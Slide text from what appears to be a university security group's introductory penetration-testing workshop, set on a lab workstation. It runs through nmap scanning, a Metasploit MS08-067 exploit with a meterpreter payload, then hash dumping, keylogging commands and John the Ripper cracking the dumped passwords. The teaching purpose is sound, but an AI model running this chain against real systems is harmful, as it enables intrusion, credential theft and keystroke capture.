Penetration Testing 101
(Boot-camp)
Computer Security Group
Mitchell Adair
utdcsg.org
Outline

“Interactive” meeting

Introduction to Backtrack

A mini penetration test
Scenario

Methodology

Enumeration, Exploitation, Post Exploitation
Exercise

Summary

Resources


Scenario


Company X wants you to test if their internal
hosts are secure. They have given you a
sample box with the default security settings the
company uses for all user workstations.
You take it back to the lab and begin to test it...
Outline

Enumeration



OS, services, versions, filters
Exploitation

Match a service + version to a known vulnerability

Exploit, getting shell access to the box
Post Exploitation

Shell is just the beginning... ;)

Hashes, SSH / GPG keys, pivot, …
Enumeration


'Nmap ("Network Mapper") is a free and open
source utility for network exploration or security
auditing.' - nmap.org
nmap [Scan Type(s)] [Options] {target specification}
Scan Types
Options

-sS, Syn

-O, OS

-sT, Connect

-sV, services

-sA, Ack

-v, verbose

…

…
… Enumeration

nmap 192.168.1.1


nmap -v -sV -O 192.168.1.1 -p 1-65535


Default scan, full SYN, top 1000 ports
Verbose, services, OS, ports 1 through 65535
nmap -PN --script=smb* -sV -O 192.168.1.1

Don't ping, run all smb* scripts, service, OS
Nmap Output
Not shown: 996 closed ports
PORT STATE SERVICE
VERSION
135/tcp open msrpc
Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
1025/tcp open mstask
Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
...
OS details: Microsoft Windows 2000 SP0/SP1/SP2 or Windows XP SP0/SP1, Microsoft
Windows XP SP1
...
Host script results:
| smb-os-discovery: Windows 2000
| smb-enum-domains:
| Domain: MITCHELL-32D5C5
| |_ SID: S-1-5-21-606747145-1647877149-725345543
| |_ Users: add, Administrator, Guest, s3cr3tus3r, sally
...
| Anonymous shares: IPC$
|_ Restricted shares: ADMIN$, C$
...
| smb-check-vulns:
|_ MS08-067: VULNERABLE
Exploitation

Metasploit – Penetration Testing Framework

tools, libraries, modules, and user interfaces

# msfconsole

msf >


use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >

set RHOST 192.168.1.1

set PAYLOAD windows/meterpreter/bind_tcp

exploit
Post Exploitation

Gather useful information

SSH & GPG keys, hashes, etc...

Meterpreter “post” modules

Pivot

meterpreter > hashdump

sysinfo

keyscan_(start | stop | dump)

download

migrate

shell
… Post Exploitation


We dumped the hashes... now what?

Pass the hash

Crack the hash
John the Ripper


a tool to find weak passwords of your users
John [options] password-files

--wordlist

--users, --groups

--session, --restore
… Post Exploitation

John --wordlist=/.../password.lst /tmp/hashes.txt
Loaded 6 password hashes with no different salts (NT LM DES
[64/64 BS MMX])
ABC123
SECRET
BASKETB
ALL
ADMIN1
(sally)
(s3cr3tus3r)
(Guest)
(webmaster:1)
(webmaster:2)
(Administrator)
guesses: 5 time: 0:00:00:00 100% c/s: 25730 trying: SKIDOO ZHONGGU
So... let's get started

Boot up to your Backtrack CD

passwd

/etc/init.d/networking start

startx

Follow along... let's pwn this box :)
Summary



Clearly... Company X's default user
workstations needs some work.
Now let's do the paperwork!... just kidding ;)
Hopefully this gives everyone a hands on
introduction to Backtrack, some essential tools,
and the attacker's mindset & process.

Feedback is always appreciated!
Resources

utdcsg.org

Presentations, articles, resources, etc.

IRC
- irc.oftc.net, #utdcsg

Nmap
- nmap.org/5/

Metasploit
- metasploit.com/

John the Ripper - openwall.com/john/